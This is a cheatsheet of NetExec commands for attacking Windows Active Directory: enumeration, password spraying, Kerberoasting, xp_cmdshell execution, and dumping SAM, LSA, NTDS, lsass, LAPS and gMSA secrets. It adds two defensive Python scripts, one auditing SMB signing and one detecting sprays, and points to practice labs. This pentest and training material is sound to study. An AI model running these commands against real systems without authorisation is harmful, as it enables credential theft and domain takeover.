# NetExec Cheatsheet
A cheatsheet for NetExec, featuring useful commands and modules for different services.

You can find this cheatsheet on my website as well: [NetExec Cheatsheet](https://seriotonctf.github.io/CrackMapExec-and-NetExec-Cheat-Sheet/)

- **GitHub:** https://github.com/Pennyw0rth/NetExec
- **Wiki:** https://www.netexec.wiki

## **Table of Contents**
1. [Installation](#installation)
2. [Basic Usage](#basic-usage)
3. [Authentication](#authentication)
   - [Null Authentication](#null-authentication)
   - [Guest Authentication](#guest-authentication)
   - [Local Authentication](#local-authentication)
   - [Kerberos Authentication](#kerberos-authentication)
   - [SMB Signing](#smb-signing)
4. [Enumeration](#enumeration)
   - [Basic Enumeration](#basic-enumeration)
   - [List Shares](#list-shares)
   - [List Usernames](#list-usernames)
   - [Spraying](#spraying)
5. [Service-Specific](#service-specific)
   - [SMB](#smb)
      - [All-in-One](#all-in-one)
      - [Extracting Files](#extracting-files)
      - [Spider_plus Module](#spider_plus-module)
      - [Generate Hosts File](#generate-hosts-file)
      - [Generate krb5 File](#generate-krb5-file)
   - [LDAP](#ldap)
      - [User Enumeration](#user-enumeration)
      - [All-in-One](#all-in-one-1)
      - [Kerberoasting & ASREProast](#kerberoasting--asreproast)
      - [BloodHound](#bloodhound)
      - [LDAP signing](#ldap-signing)
      - [ADCS Enumeration](#adcs-enumeration)
      - [MachineAccountQuota](#machineaccountquota)
      - [Pre-Created Computer Accounts](#pre-created-computer-accounts)
      - [Find Misconfigured Delegation](#find-misconfigured-delegation)
   - [MSSQL](#mssql)
      - [Authentication](#authentication-1)
      - [Executing Commands via xp_cmdshell](#executing-commands-via-xp_cmdshell)
      - [Extracting Files](#extracting-files-1)
   - [FTP](#ftp)
      - [List Files & Directories](#list-files--directories)
      - [Retrieve a File](#retrieve-a-file)
6. [Credential Dumping](#credential-dumping)
   - [Secrets Dump](#secrets-dump)
   - [NTDS](#ntds)
   - [DPAPI](#dpapi)
   - [lsass](#lsass)
   - [LAPS](#laps)
   - [gMSA](#gmsa)
   - [Group Policy Preferences](#group-policy-preferences)
   - [Retrieve MSOL account password](#retrieve-msol-account-password)
   - [Chaining Arguments](#chaining-arguments)
7. [Vulnerabilities](#vulnerabilities)
8. [Useful Modules](#useful-modules)
   - [Webdav](#webdav)
   - [Veeam](#veeam)
   - [slinky](#slinky)
   - [coerce_plus](#coerce_plus)
   - [enum_av](#enum_av)
   - [backup_operator](#backup_operator)
   - [change-password](#change-password)
9. [Resources](#resources)
10. [Practice](#practice)

## **Installation**
```
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
```
Latest version at the time of writing this:
```
netexec --version
1.4.0 - SmoothOperator - 9668cbce - 7
```
Upgrading via pipx:
```
pipx upgrade netexec
```
## **Basic Usage**
With a password:
```
netexec <protocol> <target> -u <username> -p <password>
```
With an NT hash (`-H`) instead of a password:
```
netexec <protocol> <target> -u <username> -H <nthash>
```
Example for SMB:
```
netexec smb target -u username -p password
```
## **Authentication**
### **Null Authentication**
```
netexec smb target -u '' -p ''
```
### **Guest Authentication**
```
netexec smb target -u 'guest' -p ''
```
### **Local Authentication**
```
netexec smb target -u username -p password --local-auth
```
### **Kerberos Authentication**
```
netexec smb target -u username -p password -k
```
With a ticket already present in the credential cache (`KRB5CCNAME`):
```
netexec ldap target --use-kcache
```
### **SMB Signing**
Lists the hosts on which SMB signing is not required and writes them to `relay.txt`:
```
netexec smb target(s) --gen-relay-list relay.txt
```
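The same "signing not required" list is what a defender needs as a remediation worklist. The following is an added example (not part of the cheatsheet and not NetExec's own code) that parses the one-line-per-host banner `netexec smb <targets>` prints and reports every host whose banner shows `signing:False`, plus hosts still answering SMBv1. The sample output is constructed, the hostnames and addresses are made up, and the regex assumes the banner layout NetExec printed at the time of writing (`(name:...) (domain:...) (signing:...) (SMBv1:...)`); adjust it if the banner format changes.

```python
"""Audit NetExec SMB banner output for hosts that do not require SMB signing.

Added example, not part of the cheatsheet or of NetExec itself. It reads the
banner lines `netexec smb <targets>` prints and builds the same set of hosts
that `--gen-relay-list` writes, but as a hardening worklist: every host with
`signing:False` is a host where SMB signing should be enforced by policy.
"""
import re

# Assumed banner layout (matches what NetExec printed at the time of writing).
# No end anchor, so extra trailing tokens in newer versions are tolerated.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)"
    r"\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)"
    r"\s+\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)

# Constructed sample output: hosts, names and addresses are made up.
SAMPLE_OUTPUT = """\
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.21     445    FILE01           [*] Windows Server 2016 Build 14393 x64 (name:FILE01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.37     445    WS07             [*] Windows 10 Build 19041 x64 (name:WS07) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.40     445    WS08             [*] Windows 10 Build 19041 x64 (name:WS08) (domain:corp.local) (signing:True) (SMBv1:False)
"""


def parse_banners(text):
    """Return one dict per parsed banner line; lines that do not match are skipped."""
    hosts = []
    for line in text.splitlines():
        m = BANNER_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["signing"] = d["signing"] == "True"
            d["smbv1"] = d["smbv1"] == "True"
            hosts.append(d)
    return hosts


def hosts_without_signing(hosts):
    """IPs where SMB signing is not required (the `--gen-relay-list` set)."""
    return [h["ip"] for h in hosts if not h["signing"]]


def hosts_with_smbv1(hosts):
    """IPs still answering SMBv1, a separate hardening item."""
    return [h["ip"] for h in hosts if h["smbv1"]]


def remediation_report(text):
    """Summarise a NetExec SMB run as a hardening worklist."""
    hosts = parse_banners(text)
    return {
        "total": len(hosts),
        "signing_not_required": hosts_without_signing(hosts),
        "smbv1_enabled": hosts_with_smbv1(hosts),
    }


if __name__ == "__main__":
    report = remediation_report(SAMPLE_OUTPUT)
    print(f"{report['total']} hosts parsed")
    print("Enforce SMB signing on:", ", ".join(report["signing_not_required"]))
    print("Disable SMBv1 on:", ", ".join(report["smbv1_enabled"]))
```

Run it against a saved NetExec run (`netexec smb targets.txt > scan.txt`) by reading the file into `remediation_report`; on a domain the result feeds a GPO that sets "Microsoft network server: Digitally sign communications (always)" on the listed hosts.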
## **Enumeration**
### **Basic Enumeration**
```
netexec smb target
```
### **List Shares**
```
netexec smb target -u '' -p '' --shares
netexec smb target -u username -p password --shares
```
### **List Usernames**
```
netexec smb target -u '' -p '' --users
netexec smb target -u '' -p '' --rid-brute
netexec smb target -u username -p password --users
```
### **Spraying**
```
netexec smb target -u users.txt -p password --continue-on-success
netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
```
```
netexec ssh target -u username -p password --continue-on-success
```
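On the receiving end, a spray like the one above shows up as a burst of logon failures from one source against many different accounts. The following is an added example (not part of the cheatsheet) of the detection logic a defender would run over Windows Event ID 4625 records: it flags a source address that fails against at least `min_accounts` distinct accounts inside a time window, and then lists any account that source subsequently logged on with (Event ID 4624). The events, account names and addresses are constructed; the field names (`time`, `event_id`, `user`, `src_ip`) are an assumed SIEM extraction of the 4625/4624 fields.

```python
"""Detect password spraying in Windows logon events.

Added example, not part of the cheatsheet. A lockout-aware spray stays below
the lockout threshold per account, so the detection keys on the number of
DISTINCT accounts per source address, not on failures per account.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in the shape a SIEM would extract from Event ID
# 4625 (logon failure) and 4624 (logon success). All values are made up.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:01", "event_id": 4625, "user": "alice", "src_ip": "10.10.10.99"},
    {"time": "2024-05-01T09:00:02", "event_id": 4625, "user": "bob",   "src_ip": "10.10.10.99"},
    {"time": "2024-05-01T09:00:03", "event_id": 4625, "user": "carol", "src_ip": "10.10.10.99"},
    {"time": "2024-05-01T09:00:04", "event_id": 4625, "user": "dave",  "src_ip": "10.10.10.99"},
    {"time": "2024-05-01T09:00:05", "event_id": 4625, "user": "erin",  "src_ip": "10.10.10.99"},
    {"time": "2024-05-01T09:00:06", "event_id": 4624, "user": "frank", "src_ip": "10.10.10.99"},  # the one that worked
    {"time": "2024-05-01T09:05:00", "event_id": 4625, "user": "grace", "src_ip": "10.10.10.50"},  # a user mistyping
    {"time": "2024-05-01T09:05:30", "event_id": 4625, "user": "grace", "src_ip": "10.10.10.50"},
    {"time": "2024-05-01T10:00:00", "event_id": 4625, "user": "heidi", "src_ip": "10.10.10.77"},  # slow source
    {"time": "2024-05-01T10:30:00", "event_id": 4625, "user": "ivan",  "src_ip": "10.10.10.77"},
    {"time": "2024-05-01T11:00:00", "event_id": 4625, "user": "judy",  "src_ip": "10.10.10.77"},
    {"time": "2024-05-01T11:30:00", "event_id": 4625, "user": "kate",  "src_ip": "10.10.10.77"},
    {"time": "2024-05-01T12:00:00", "event_id": 4625, "user": "leo",   "src_ip": "10.10.10.77"},
]

LOGON_FAILURE = 4625
LOGON_SUCCESS = 4624


def spray_sources(events, min_accounts=5, window=timedelta(minutes=10)):
    """Return {src_ip: sorted distinct accounts} for every source that failed
    against at least `min_accounts` distinct accounts within one `window`."""
    by_src = defaultdict(list)
    for e in events:
        if e.get("event_id") != LOGON_FAILURE:
            continue
        by_src[e["src_ip"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))

    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        # Slide a window over the time-ordered failures from this source.
        for i, (t0, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - t0 <= window}
            if len(users) >= min_accounts:
                hits[src] = sorted(users)
                break
    return hits


def successes_from_sprayers(events, hits):
    """For each flagged source, the accounts it later logged on with: the
    credentials that need resetting first."""
    found = defaultdict(set)
    for e in events:
        if e.get("event_id") == LOGON_SUCCESS and e["src_ip"] in hits:
            found[e["src_ip"]].add(e["user"].lower())
    return {src: sorted(users) for src, users in found.items()}


if __name__ == "__main__":
    hits = spray_sources(SAMPLE_EVENTS)
    for src, users in hits.items():
        print(f"{src}: {len(users)} distinct accounts failed: {', '.join(users)}")
    for src, users in successes_from_sprayers(SAMPLE_EVENTS, hits).items():
        print(f"{src}: successful logon as {', '.join(users)} after spraying")
```

The threshold and window are tuning knobs: the slow source in the sample (one account every 30 minutes) is invisible to a 10-minute window and only appears when the window is widened to a few hours, which is the trade-off between catching low-and-slow sprays and paging on help-desk noise. When the spray is run over Kerberos (`-k`), the failures land on the domain controller as Event ID 4771 rather than 4625, so the same logic should be run with that event ID as well.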
## **Service-Specific**
### **SMB**
#### **All-in-One**
```
netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
```
#### **Extracting Files**
```
netexec smb target -u username -p password -k --get-file target_file output_file --share sharename
```
#### **Spider_plus Module**
```
netexec smb target -u username -p password -M spider_plus
netexec smb target -u username -p password -M spider_plus -o READ_ONLY=false
```
#### **Generate Hosts File**
```
netexec smb target --generate-hosts-file
```
#### **Generate krb5 File**
```
netexec smb target -u username -p password --generate-krb5-file
```
### **LDAP**
#### **User Enumeration**
```
netexec ldap target -u '' -p '' --users
```
#### **All-in-One**
```
netexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups
```
#### **Kerberoasting & ASREProast**
```
netexec ldap target -u username -p password --kerberoasting hash.txt
netexec ldap target -u username -p password --asreproast hash.txt
```
#### **BloodHound**
```
netexec ldap target -u username -p password --bloodhound --dns-server ip --dns-tcp -c all
```
#### **LDAP signing**
Checks whether LDAP signing and LDAPS channel binding are required and/or enforced
```
netexec ldap target -u username -p password -M ldap-checker
```
#### **ADCS Enumeration**
```
netexec ldap target -u username -p password -M adcs
```
#### **MachineAccountQuota**
```
netexec ldap target -u username -p password -M maq
```
#### **Pre-Created Computer Accounts**
```
netexec ldap target -u username -p password -M pre2k
```
#### **Find Misconfigured Delegation**
```
netexec ldap target -u username -p password --find-delegation
```
### **MSSQL**
#### **Authentication**
```
netexec mssql target -u username -p password
```
#### **Executing Commands via xp_cmdshell**
```
netexec mssql target -u username -p password -x command_to_execute
```
#### **Extracting Files**
```
netexec mssql target -u username -p password --get-file output_file target_file
```
### **FTP**
#### **List Files & Directories**
```
netexec ftp target -u username -p password --ls
netexec ftp target -u username -p password --ls folder_name
```
#### **Retrieve a File**
```
netexec ftp target -u username -p password --ls folder_name --get file_name
```
## **Credential Dumping**
### **Secrets Dump**
```
netexec smb target -u username -p password --lsa
netexec smb target -u username -p password --sam
```
### **NTDS**
```
netexec smb target -u username -p password --ntds
netexec smb target -u username -p password -M ntdsutil
```
### **DPAPI**
```
netexec smb target -u username -p password --dpapi
```
### **lsass**
```
netexec smb target -u username -p password -M lsassy
```
### **LAPS**
```
netexec smb target -u username -p password --laps
```
### **gMSA**
```
netexec ldap target -u username -p password --gmsa
netexec ldap target -u username -p password --gmsa-convert-id id
netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account
```
### **Group Policy Preferences**
```
netexec smb target -u username -p password -M gpp_password
```
### **Retrieve MSOL account password**
```
netexec smb target -u username -p password -M msol
```
### **Chaining Arguments**
```
netexec smb target -u username -p password --sam --lsa --dpapi
```
## **Vulnerabilities**
Checks whether the DC is vulnerable to Zerologon, PetitPotam, or noPac
```
netexec smb target -u username -p password -M zerologon
netexec smb target -u username -p password -M petitpotam
netexec smb target -u username -p password -M nopac
```
## **Useful Modules**
### **Webdav**
Checks whether the WebClient service is running on the target
```
netexec smb target -u username -p password -M webdav
```
### **Veeam**
Extracts credentials from the local Veeam SQL database
```
netexec smb target -u username -p password -M veeam
```
### **slinky**
Creates Windows shortcuts whose icon attribute points to a UNC path on the specified SMB server, in every share with write permissions
```
netexec smb target -u username -p password -M slinky
```
### **coerce_plus**
Checks whether the target is vulnerable to any of the coercion vulnerabilities (PetitPotam, DFSCoerce, MSEven, ShadowCoerce and PrinterBug)
```
netexec smb target -u username -p password -M coerce_plus -o LISTENER=tun0_ip
```
### **enum_av**
Gathers information on all endpoint protection solutions installed on the remote host
```
netexec smb target -u username -p password -M enum_av
```
### **backup_operator**
Uses a user in the Backup Operators group to dump NTDS
```
netexec smb target -u username -p password -M backup_operator
```
### **change-password**
Changes or resets a user's password
```
netexec smb target -u username -p password -M change-password -o USER='target_user' NEWPASS='new_password'
```
## **Resources**
- https://www.netexec.wiki/
- https://www.rayanle.cat/lehack-2024-netexec-workshop-writeup/
## **Practice**
- Mist (HackTheBox)
- Rebound (HackTheBox)
- Vintage (HackTheBox)
- Cicada (HackTheBox)
- Baby (Vulnlab)
- Intercept (Vulnlab)
- Reflection (Vulnlab)
- NetExec Lab (https://github.com/Pennyw0rth/NetExec-Lab)